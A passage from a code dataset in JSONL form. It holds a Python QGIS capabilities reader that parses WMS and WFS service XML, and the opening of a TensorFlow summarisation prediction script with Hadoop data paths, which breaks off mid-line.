{"api_name": "rest_framework_simplejwt.views.TokenRefreshView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "rest_framework_simplejwt.views.TokenRefreshView", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "43650469888", "text": "from collections import OrderedDict\nfrom urllib.parse import urljoin, urlparse\nfrom xml.etree import ElementTree\n\nimport re\nimport requests\n\n\nclass CapabilitiesReader():\n \"\"\"CapabilitiesReader class\n\n Load and parse WMS GetProjectSettings and WFS Capabilities\n \"\"\"\n\n def __init__(self, generator_config, logger):\n \"\"\"Constructor\n\n :param obj generator_config: ConfigGenerator config\n :param Logger logger: Logger\n \"\"\"\n self.logger = logger\n\n # get default QGIS server URL from ConfigGenerator config\n self.default_qgis_server_url = generator_config.get(\n 'default_qgis_server_url', 'http://localhost:8001/ows/'\n ).rstrip('/') + '/'\n\n # layer opacity values for QGIS <= 3.10 from ConfigGenerator config\n self.layer_opacities = generator_config.get(\"layer_opacities\", {})\n\n # Skip group layers containing print layers\n self.skip_print_layer_groups = generator_config.get(\n 'skip_print_layer_groups', False)\n\n self.project_settings_read_timeout = generator_config.get(\n \"project_settings_read_timeout\", 60\n )\n\n # WMS GetProjectSettings\n\n def 
read_wms_service_capabilities(self, url, service_name, item):\n \"\"\"Load and parse WMS GetProjectSettings for a theme item.\n\n :param str url: service URL\n :param str service_name: service name\n :param object item: theme item\n \"\"\"\n\n try:\n # get GetProjectSettings\n full_url = urljoin(self.default_qgis_server_url, url)\n self.logger.info(\n \"Downloading WMS GetProjectSettings from %s\" % full_url\n )\n\n if len(full_url) > 2000:\n self.logger.warning(\n \"WMS URL is longer than 2000 characters!\")\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WMS',\n 'VERSION': '1.3.0',\n 'REQUEST': 'GetProjectSettings',\n 'CLEARCACHE': '1'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.critical(\n \"Could not get WMS GetProjectSettings from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WMS GetProjectSettings XML\n ElementTree.register_namespace('', 'http://www.opengis.net/wms')\n ElementTree.register_namespace('qgs', 'http://www.qgis.org/wms')\n ElementTree.register_namespace('sld', 'http://www.opengis.net/sld')\n ElementTree.register_namespace(\n 'xlink', 'http://www.w3.org/1999/xlink'\n )\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {'ns': 'http://www.opengis.net/wms'}\n # namespace prefix\n np = 'ns:'\n if not root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n root_layer = root.find('%sCapability/%sLayer' % (np, np), ns)\n if root_layer is None:\n self.logger.warning(\n \"No root layer found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n\n # NOTE: use ordered keys\n capabilities = OrderedDict()\n\n capabilities['name'] = service_name\n capabilities['wms_url'] = full_url\n\n # get service title\n service_title = root.find('%sService/%sTitle' % (np, np), ns)\n if service_title is not None:\n capabilities['title'] = service_title.text\n if capabilities['title'] == \"Untitled\":\n capabilities['title'] = re.sub('.*/', '', service_name)\n\n # get service abstract\n service_abstract = root.find('%sService/%sAbstract' % (np, np), ns)\n if service_abstract is not None:\n capabilities['abstract'] = service_abstract.text\n\n # collect service keywords\n keyword_list = root.find('%sService/%sKeywordList' % (np, np), ns)\n if keyword_list is not None:\n keywords = [\n keyword.text for keyword\n in keyword_list.findall('%sKeyword' % np, ns)\n if keyword.text != 'infoMapAccessService'\n ]\n if keywords:\n capabilities['keywords'] = ', '.join(keywords)\n\n # service online resource\n online_resource = root.find('%sService/%sOnlineResource' % (np, np), ns)\n if online_resource is not None:\n capabilities['online_resource'] = online_resource.get('{http://www.w3.org/1999/xlink}href')\n\n # service contact\n contact_person = root.find(\"%sService/%sContactInformation/%sContactPersonPrimary/%sContactPerson\" % (np, np, np, np), ns)\n contact_organization = root.find(\"%sService/%sContactInformation/%sContactPersonPrimary/%sContactOrganization\" % (np, np, np, np), ns)\n contact_position = root.find(\"%sService/%sContactInformation/%sContactPosition\" % (np, np, np), ns)\n contact_phone = root.find(\"%sService/%sContactInformation/%sContactVoiceTelephone\" % (np, np, np), ns)\n contact_email = root.find(\"%sService/%sContactInformation/%sContactElectronicMailAddress\" % (np, np, np), ns)\n\n\n capabilities[\"contact\"] = {\n \"person\": 
contact_person.text if contact_person is not None else None,\n \"organization\": contact_organization.text if contact_organization is not None else None,\n \"position\": contact_position.text if contact_position is not None else None,\n \"phone\": contact_phone.text if contact_phone is not None else None,\n \"email\": contact_email.text if contact_email is not None else None\n }\n\n # collect internal print layers\n internal_print_layers = []\n for bg_layer in item.get('backgroundLayers', []):\n printLayer = bg_layer.get('printLayer', None)\n if printLayer:\n if isinstance(printLayer, str):\n internal_print_layers.append(printLayer)\n elif isinstance(printLayer, list):\n for entry in printLayer:\n internal_print_layers.append(entry.get('name'))\n\n # collect WMS layers\n default_root_name = urlparse(full_url).path.split('/')[-1]\n layer_names = []\n capabilities['root_layer'] = self.collect_wms_layers(\n root_layer, layer_names, internal_print_layers, ns, np, default_root_name\n )\n # collect geometryless WMS layers\n geometryless_layers = self.collect_geometryless_layers(\n root_layer, internal_print_layers, ns, np, default_root_name\n )\n if capabilities['root_layer'] is None:\n self.logger.warning(\n \"No (non geometryless) layers found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n # Check if a layer has the same name as the root layer - and if so, abort\n root_layer_name = capabilities['root_layer'].get('name')\n layers = capabilities['root_layer'].get('layers')\n if layers is not None:\n for layer in layers:\n if layer.get('name') == root_layer_name:\n self.logger.critical(\n \"The service %s contains a layer with the same name as the service. Please rename the service or the layer.\"\n % root_layer_name\n )\n\n # get drawing order\n drawing_order = root.find(\n '%sCapability/%sLayerDrawingOrder' % (np, np), ns\n )\n if drawing_order is not None:\n capabilities['drawing_order'] = drawing_order.text.split(',')\n\n # GetMap formats\n capabilities['map_formats'] = list(map(lambda el: el.text, root.findall(\n '%sCapability/%sRequest/%sGetMap/%sFormat' % (np, np, np, np), ns\n )))\n\n # GetFeatureInfo formats\n capabilities['info_formats'] = list(map(lambda el: el.text, root.findall(\n '%sCapability/%sRequest/%sGetFeatureInfo/%sFormat' % (np, np, np, np), ns\n )))\n\n # collect print templates\n print_templates = self.print_templates(root, np, ns)\n if print_templates:\n capabilities['print_templates'] = print_templates\n\n if internal_print_layers:\n capabilities['internal_print_layers'] = internal_print_layers\n\n if geometryless_layers:\n capabilities['geometryless_layers'] = geometryless_layers\n\n return capabilities\n except Exception as e:\n self.logger.critical(\n \"Could not get WMS GetProjectSettings from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n\n def collect_wms_layers(self, layer, layer_names, internal_print_layers, ns, np,\n fallback_name=\"\"):\n \"\"\"Recursively collect layer info for layer subtree from\n WMS GetProjectSettings.\n\n :param Element layer: GetProjectSettings layer node\n :param list(str) internal_print_layers: List of internal print layers\n to filter\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n :param str fallback_name: Layer name if empty in GetProjectSettings\n \"\"\"\n # NOTE: use ordered keys\n wms_layer = OrderedDict()\n\n layer_name_tag = layer.find('%sName' % np, ns)\n if layer_name_tag is not None:\n layer_name = layer_name_tag.text\n else:\n layer_name = fallback_name\n\n if \",\" in layer_name:\n 
self.logger.warning(\n f\"The layer '{layer_name}' contains a comma! \"\n \"The WMS name of a layer must not contain a comma! \"\n \"Either remove the comma or specify 'short_name' in the QGIS project.\"\n )\n if layer_name in layer_names:\n self.logger.warning(\n f\"Duplicate layer name '{layer_name}'! \"\n \"Please rename the duplicate occurrences.\"\n )\n else:\n layer_names.append(layer_name)\n\n wms_layer['name'] = layer_name\n\n layer_title_tag = layer.find('%sTitle' % np, ns)\n if layer_title_tag is not None:\n wms_layer['title'] = layer_title_tag.text\n\n # collect dimensions\n wms_layer['dimensions'] = []\n for dim in layer.findall(\"%sDimension\" % np, ns):\n wms_layer['dimensions'].append({\n 'units': dim.get('units'),\n 'name': dim.get('name'),\n 'multiple': dim.get('multipleValues') == '1',\n 'value': dim.text,\n 'fieldName': dim.get('fieldName', None),\n 'endFieldName': dim.get('endFieldName', None)\n })\n\n # collect sub layers if group layer\n group_layers = []\n for sub_layer in layer.findall('%sLayer' % np, ns):\n sub_layer_name = sub_layer.find('%sName' % np, ns).text\n\n if sub_layer_name in internal_print_layers:\n # skip internal print layers\n if self.skip_print_layer_groups:\n return None\n else:\n continue\n\n sub_wms_layer = self.collect_wms_layers(\n sub_layer, layer_names, internal_print_layers, ns, np\n )\n if sub_wms_layer is not None:\n group_layers.append(sub_wms_layer)\n\n if group_layers:\n # group layer\n wms_layer[\"expanded\"] = layer.get(\n 'expanded', '1') == '1'\n wms_layer[\"mutuallyExclusive\"] = layer.get(\n 'mutuallyExclusive') == '1'\n wms_layer['layers'] = group_layers\n else:\n # layer\n if (\n layer.get('geometryType') == 'WKBNoGeometry'\n or layer.get('geometryType') == 'NoGeometry'\n ):\n # skip layer without geometry\n return None\n\n # collect attributes\n attributes = []\n attrs = layer.find('%sAttributes' % np, ns)\n if attrs is not None:\n for attr in attrs.findall('%sAttribute' % np, ns):\n attributes.append(attr.get('alias', attr.get('name')))\n attributes.append('geometry')\n attributes.append('maptip')\n\n if attributes:\n wms_layer['attributes'] = attributes\n\n if layer.find('%sAbstract' % np, ns) is not None:\n wms_layer[\"abstract\"] = layer.find('%sAbstract' % np, ns).text\n\n if layer.find('%sKeywordList' % np, ns):\n keywords = []\n for keyword in layer.find('%sKeywordList' % np, ns).findall(\n '%sKeyword' % np, ns):\n keywords.append(keyword.text)\n wms_layer[\"keywords\"] = \", \".join(keywords)\n\n\n try:\n wms_layer[\"attribution\"] = layer.find('%sAttribution' % np, ns).find('%sTitle' % np, ns).text\n wms_layer[\"attributionUrl\"] = layer.find('%sAttribution' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n try:\n wms_layer[\"dataUrl\"] = layer.find('%sDataURL' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n try:\n wms_layer[\"metadataUrl\"] = layer.find('%sMetadataURL' % np, ns).find('%sOnlineResource' % np, ns).get('{http://www.w3.org/1999/xlink}href')\n except:\n pass\n\n\n if layer.get('transparency'):\n wms_layer['opacity'] = 255 - int(float(\n layer.get('transparency')) / 100 * 255\n )\n elif layer.get('opacity'):\n wms_layer['opacity'] = int(float(layer.get(\"opacity\")) * 255)\n else:\n # custom layer opacities (default: 255)\n # name = getChildElementValue(layer, [np['ns'] + \"Name\"], ns)\n opacity = self.layer_opacities.get(layer_name, 255)\n wms_layer['opacity'] = opacity\n\n minScale = 
layer.find('%sMinScaleDenominator' % np, ns)\n maxScale = layer.find('%sMaxScaleDenominator' % np, ns)\n if minScale is not None:\n wms_layer[\"minScale\"] = minScale.text\n if maxScale is not None:\n wms_layer[\"maxScale\"] = maxScale.text\n\n if 'visibilityChecked' in layer.attrib:\n wms_layer['visible'] = layer.get('visibilityChecked') == '1'\n else:\n wms_layer['visible'] = layer.get('visible') == '1'\n wms_layer['geometryType'] = layer.get('geometryType')\n\n wms_layer['queryable'] = layer.get('queryable') == '1'\n if wms_layer['queryable'] and layer.get('displayField'):\n wms_layer['display_field'] = layer.get('displayField')\n\n # get default CRS (first CRS)\n wms_layer['crs'] = layer.find('%sCRS' %np, ns).text\n\n # NOTE: get geographic bounding box, as default CRS may have\n # inverted axis order with WMS 1.3.0\n bbox = layer.find('%sEX_GeographicBoundingBox' % np, ns)\n if bbox is not None:\n wms_layer['bbox'] = [\n float(bbox.find('%swestBoundLongitude' % np, ns).text),\n float(bbox.find('%ssouthBoundLatitude' % np, ns).text),\n float(bbox.find('%seastBoundLongitude' % np, ns).text),\n float(bbox.find('%snorthBoundLatitude' % np, ns).text)\n ]\n\n return wms_layer\n\n def collect_geometryless_layers(self, layer, internal_print_layers, ns, np,\n fallback_name=\"\", geometryless_layer_names=set()):\n \"\"\"Recursively collect layer names of geometryless layers from\n WMS GetProjectSettings.\n\n :param Element layer: GetProjectSettings layer node\n :param list(str) internal_print_layers: List of internal print layers\n to filter\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n :param str fallback_name: Layer name if empty in GetProjectSettings\n :param set geometryless_layer_names: A set of geometryless layer names\n \"\"\"\n # NOTE: use ordered keys\n layer_name_tag = layer.find('%sName' % np, ns)\n if layer_name_tag is not None:\n layer_name = layer_name_tag.text\n else:\n layer_name = fallback_name\n\n # collect sub layers if group layer\n group_layers = set()\n for sub_layer in layer.findall('%sLayer' % np, ns):\n sub_layer_name = sub_layer.find('%sName' % np, ns).text\n\n if sub_layer_name in internal_print_layers:\n continue\n\n sub_wms_layer = self.collect_geometryless_layers(\n sub_layer, internal_print_layers, ns, np\n )\n if sub_wms_layer is not None and isinstance(sub_wms_layer, list):\n group_layers.update(sub_wms_layer)\n elif sub_wms_layer is not None:\n group_layers.add(sub_wms_layer)\n\n if group_layers:\n # group layer\n geometryless_layer_names.update(group_layers)\n else:\n # layer\n if (\n layer.get('geometryType') == 'WKBNoGeometry'\n or layer.get('geometryType') == 'NoGeometry'\n ):\n # skip layer without geometry\n return layer_name\n else:\n return None\n\n return list(geometryless_layer_names)\n\n def print_templates(self, root, np, ns):\n \"\"\"Collect print templates from WMS GetProjectSettings.\n\n :param Element root: GetProjectSettings root node\n :param obj ns: Namespace dict\n :param str np: Namespace prefix\n \"\"\"\n print_templates = []\n composer_template_map = {}\n for template in root.findall('.//%sComposerTemplate' % np, ns):\n composer_template_map[template.get('name')] = template\n\n for template in composer_template_map.values():\n template_name = template.get('name')\n if template_name.endswith(\"_legend\") and template_name[:-7] in composer_template_map:\n continue\n\n # NOTE: use ordered keys\n print_template = OrderedDict()\n print_template['name'] = template.get('name')\n if template_name + \"_legend\" in 
composer_template_map:\n print_template[\"legendLayout\"] = template_name + \"_legend\";\n\n composer_map = template.find('%sComposerMap' % np, ns)\n if composer_map is not None:\n print_map = OrderedDict()\n print_map['name'] = composer_map.get('name')\n print_map['width'] = float(composer_map.get('width'))\n print_map['height'] = float(composer_map.get('height'))\n print_template['map'] = print_map\n if template.get('atlasEnabled') == '1':\n atlasLayer = template.get('atlasCoverageLayer')\n try:\n pk = root.find(\".//%sLayer/[%sName = '%s']\" % (np, np, atlasLayer), ns).find('./%sPrimaryKey/%sPrimaryKeyAttribute' % (np, np), ns).text\n print_template['atlasCoverageLayer'] = atlasLayer\n print_template['atlas_pk'] = pk\n except:\n self.logger.warning(\"Failed to determine primary key for atlas layer %s!\" % atlasLayer)\n pass\n\n labels = []\n for label in template.findall('%sComposerLabel' % np, ns):\n labels.append(label.get('name'))\n if labels:\n print_template['labels'] = labels\n\n print_templates.append(print_template)\n\n return print_templates\n\n # WFS Capabilities\n\n def read_wfs_service_capabilities(self, url, service_name, item):\n \"\"\"Load and parse WFS GetCapabilities for a theme item.\n\n NOTE: returns empty result if WFS does not contains any layers\n\n :param str url: service URL\n :param str service_name: service name\n :param object item: theme item\n \"\"\"\n try:\n # get GetProjectSettings\n full_url = urljoin(self.default_qgis_server_url, url)\n self.logger.info(\n \"Downloading WFS GetCapabilities from %s\" % full_url\n )\n\n if len(full_url) > 2000:\n self.logger.warning(\n \"WFS URL is longer than 2000 characters!\")\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WFS',\n 'VERSION': '1.1.0',\n 'REQUEST': 'GetCapabilities',\n 'CLEARCACHE': '1'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.error(\n \"Could not get WFS GetCapabilities from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WFS Capabilities XML\n ElementTree.register_namespace('', 'http://www.opengis.net/wfs')\n ElementTree.register_namespace('ows', 'http://www.opengis.net/ows')\n ElementTree.register_namespace('gml', 'http://www.opengis.net/gml')\n ElementTree.register_namespace('ogc', 'http://www.opengis.net/ogc')\n ElementTree.register_namespace(\n 'xlink', 'http://www.w3.org/1999/xlink'\n )\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {\n 'ns': 'http://www.opengis.net/wfs',\n 'ows': 'http://www.opengis.net/ows'\n }\n # namespace prefix\n np = 'ns:'\n np_ows = 'ows:'\n if not root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n feature_type_list = root.find('%sFeatureTypeList' % np, ns)\n if feature_type_list is None:\n self.logger.warning(\n \"No FeatureTypeList found for %s: %s\" %\n (full_url, response.content)\n )\n return {}\n\n if feature_type_list.find('%sFeatureType' % np, ns) is None:\n self.logger.debug(\"No WFS layers found for %s\" % full_url)\n return {}\n\n # NOTE: use ordered keys\n capabilities = OrderedDict()\n\n capabilities['name'] = service_name\n capabilities['wfs_url'] = full_url\n\n # get service title\n service_title = root.find('%sServiceIdentification/%sTitle' % (np_ows, np_ows), ns)\n if service_title is not None:\n capabilities['title'] = service_title.text\n\n # get service abstract\n service_abstract = 
root.find('%sServiceIdentification/%sAbstract' % (np_ows, np_ows), ns)\n if service_abstract is not None:\n capabilities['abstract'] = service_abstract.text\n\n # collect service keywords\n keyword_list = root.find('%sServiceIdentification/%sKeywords' % (np_ows, np_ows), ns)\n if keyword_list is not None:\n keywords = [\n keyword.text for keyword\n in keyword_list.findall('%sKeyword' % np_ows, ns)\n ]\n if keywords:\n capabilities['keywords'] = ', '.join(keywords)\n\n # service provider\n provider_name = root.find(\"%sServiceProvider/%sProviderName\" % (np_ows, np_ows), ns)\n individual_name = root.find(\"%sServiceProvider/%sServiceContact/%sIndividualName\" % (np_ows, np_ows, np_ows), ns)\n position_name = root.find(\"%sServiceProvider/%sServiceContact/%sPositionName\" % (np_ows, np_ows, np_ows), ns)\n\n capabilities[\"contact\"] = {\n \"person\": individual_name.text if individual_name is not None else None,\n \"organization\": provider_name.text if provider_name is not None else None,\n \"position\": position_name.text if position_name is not None else None\n }\n\n # collect WFS layer attributes\n wfs_layers_attributes = self.collect_wfs_layers_attributes(full_url)\n\n # collect WFS layers\n wfs_layers = []\n for layer in feature_type_list.findall('%sFeatureType' % np, ns):\n # NOTE: use ordered keys\n wfs_layer = OrderedDict()\n\n layer_name = layer.find('%sName' % np, ns).text\n wfs_layer['name'] = layer_name\n wfs_layer['title'] = layer.find('%sTitle' % np, ns).text\n wfs_layer['attributes'] = wfs_layers_attributes.get(layer_name, [])\n\n wfs_layers.append(wfs_layer)\n\n capabilities[\"wfs_layers\"] = wfs_layers\n\n return capabilities\n except Exception as e:\n self.logger.error(\n \"Could not get WFS GetCapabilities from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n\n def collect_wfs_layers_attributes(self, full_url):\n \"\"\"Get all WFS layer attributes from WFS DescribeFeatureType.\n\n Returns dict as {: []}\n\n :param str full_url: WFS URL\n \"\"\"\n try:\n self.logger.info(\n \"Downloading WFS DescribeFeatureType from %s\" % full_url\n )\n\n response = requests.get(\n full_url,\n params={\n 'SERVICE': 'WFS',\n 'VERSION': '1.1.0',\n 'REQUEST': 'DescribeFeatureType'\n },\n timeout=self.project_settings_read_timeout\n )\n\n if response.status_code != requests.codes.ok:\n self.logger.error(\n \"Could not get WFS DescribeFeatureType from %s:\\n%s\" %\n (full_url, response.content)\n )\n return {}\n\n document = response.content\n\n # parse WFS Capabilities XML\n ElementTree.register_namespace('', 'http://www.w3.org/2001/XMLSchema')\n ElementTree.register_namespace('gml', 'http://www.opengis.net/gml')\n ElementTree.register_namespace('qgs', 'http://www.qgis.org/wms')\n ElementTree.register_namespace('ogc', 'http://www.opengis.net/ogc')\n root = ElementTree.fromstring(document)\n\n # use default namespace for XML search\n # namespace dict\n ns = {'ns': 'http://www.w3.org/2001/XMLSchema'}\n # namespace prefix\n np = 'ns:'\n if not root.tag.startswith('{http://'):\n # do not use namespace\n ns = {}\n np = ''\n\n layers_attributes = {}\n\n for complex_type in root.findall('%scomplexType' % np, ns):\n # extract layer name from complexType by removing \"Type\" suffix\n # e.g. 
\"edit_pointsType\" -> \"edit_points\"\n layer_name = complex_type.get('name').removesuffix('Type')\n\n attributes = []\n for element in complex_type.findall('%scomplexContent/%sextension/%ssequence/%selement' % (np, np, np, np), ns):\n attributes.append(element.get('name'))\n\n layers_attributes[layer_name] = attributes\n\n return layers_attributes\n except Exception as e:\n self.logger.error(\n \"Could not get WFS DescribeFeatureType from %s:\\n%s\" %\n (full_url, e)\n )\n return {}\n", "repo_name": "qwc-services/qwc-config-generator", "sub_path": "config_generator/capabilities_reader.py", "file_name": "capabilities_reader.py", "file_ext": "py", "file_size_in_byte": 28731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.parse.urljoin", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 71, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 81, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 81, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 82, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 82, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 83, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 83, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 84, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 84, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 87, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 87, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 108, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "urllib.parse.urlparse", "line_number": 169, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 244, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 473, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 480, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 518, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 527, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 538, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 548, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 548, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 549, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 549, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 550, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 550, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 551, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 551, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 552, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 552, "usage_type": "name"}, {"api_name": 
"xml.etree.ElementTree.fromstring", "line_number": 555, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 555, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 584, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 627, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 658, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 668, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 678, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 678, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 679, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 679, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 680, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 680, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.register_namespace", "line_number": 681, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 681, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 682, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 682, "usage_type": "name"}]} +{"seq_id": "3427895101", "text": "#!/usr/bin/env python\n#coding:utf8\nimport numpy\nimport argparse\nimport logging\nimport os\nimport sys\n#import cPickle as pkl\n#from helper import Config\n#from helper import Dataset\n#from helper import DataLoader\n#from helper import prepare_data\n#from helper import test\nimport data_reader as dr\nimport datetime\nfrom datetime import timedelta\nimport codecs\nimport time\nimport tensorflow as tf\nfrom sklearn import metrics\nfrom model import SummaRuNNer\n\nlogging.basicConfig(level = logging.INFO, format = '%(asctime)s [INFO] %(message)s')\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--sen_len', type=int, default=100)\nparser.add_argument('--doc_len', type=int, default=100)\nparser.add_argument('--train_file', type=str, default='./data/split_90/')\nparser.add_argument('--validation_file', type=str, default='./data/split_90/valid')\n# parser.add_argument('--model_dir', type=str, default='./runs/1532436443/checkpoints/')\nparser.add_argument('--model_dir', type=str, default='./checkpoints/')\nparser.add_argument('--epochs', type=int, default=15)\nparser.add_argument('--hidden', type=int, default=110)\nparser.add_argument('--lr', type=float, default=1e-4)\n\nFLAGS=tf.app.flags.FLAGS\n# 批量预测\ntf.app.flags.DEFINE_boolean(\"predict_incrementally\",True,\"if need to predict only the latest part\") #是否需要增量预测\ntf.app.flags.DEFINE_string(\"predict_target_file\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/dp_struccontent_summary_model/test\",\"predict result\")\nif FLAGS.predict_incrementally == True:\n tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr_test.db/temp_summary_high_ctr_seg\",\"path of traning data.\") # recreason_before_lm_model_incre\nif FLAGS.predict_incrementally == False:\n tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr_test.db/temp_summary_high_ctr_seg\",\"path of traning data.\") # TODO 
uses the test DB\n#tf.app.flags.DEFINE_string(\"predict_target_file\",\"viewfs://hadoop-meituan/user/hive/warehouse/mart_dpsr.db/bert_comment_sample_info_seg_lm/test\",\"predict result\")\n#tf.app.flags.DEFINE_string(\"training_data_path\",\"viewfs://hadoop-meituan/user/hive/warehouse/mart_dpsr.db/bert_comment_sample_info_seg_bak\",\"path of training data.\") # bert data filtering\ntf.app.flags.DEFINE_string(\"ckpt_dir\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/summary/\",\"checkpoint location for the model\")\n# tf.app.flags.DEFINE_string(\"vocabulary_word2index\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/recreason_lm/word2index1203_2.pkl\",\"vocabulary_word2index\")\n# tf.app.flags.DEFINE_string(\"vocabulary_label2index\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/recreason_lm/label2index1203_2.pkl\",\"vocabulary_label2index\")\ntf.app.flags.DEFINE_string(\"emb_path\",\"viewfs://hadoop-meituan/zw01nn11/warehouse/mart_dpsr.db/lantian/summary/model2\",\"word2vec's vocabulary and vectors\")\ntf.app.flags.DEFINE_integer(\"workers\", 1, \"work node num\")\ntf.app.flags.DEFINE_integer(\"task_index\", 0, \"Index of task within the job\")\ntf.app.flags.DEFINE_string(\"delimiter\", \"\\t\", \"field delimiter for prediction output\") # assumed default for a flag referenced below but never defined\ntf.app.flags.DEFINE_integer(\"line_per_file\", 100000, \"number of input lines consumed per prediction chunk\") # assumed default for a flag referenced below but never defined\n\nconfig_proto = tf.ConfigProto(log_device_placement=False, allow_soft_placement=True)\nconfig_proto.gpu_options.allow_growth = True\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\n\nargs = parser.parse_args()\nmax_sen_length = args.sen_len\nmax_doc_length = args.doc_len\nstart_time = time.time()\nlogging.info('generate config')\n\nstart = datetime.datetime.now()\nprint(\"starting time : \" + str(start))\nworkers = FLAGS.workers\nlist_name = tf.gfile.ListDirectory(FLAGS.training_data_path)\ntotal_file_num = len(list_name)\nprint(\"list_name : \" + str(list_name))\nprint(\"taskindex : \" + str(FLAGS.task_index))\nprint(\"total file num : \" + str(total_file_num))\ncur_file_names = list_name[FLAGS.task_index:total_file_num:FLAGS.workers]\nprint(\"cur_file_names : \" + str(cur_file_names))\nfileList = [os.path.join(FLAGS.training_data_path, a) for a in cur_file_names]\nprint(\"fileList : \" + str(fileList))\n\nbatch_size = 1\ntime1 = time.time()\nwrite_index = 0\nshouldEnd = False\nsub_task_id = 0\n\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.compat.v1.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.compat.v1.Session(config=session_conf)\n with sess.as_default():\n # saver = tf.compat.v1.train.import_meta_graph('./runs/1564993889/checkpoints/model-512.meta')\n # module_file = tf.train.latest_checkpoint(\"./runs/1564993889/\" + 'checkpoints/')\n saver = tf.compat.v1.train.import_meta_graph(FLAGS.ckpt_dir + 'model.meta')\n module_file = tf.train.latest_checkpoint(FLAGS.ckpt_dir)\n saver.restore(sess, module_file)\n # f0 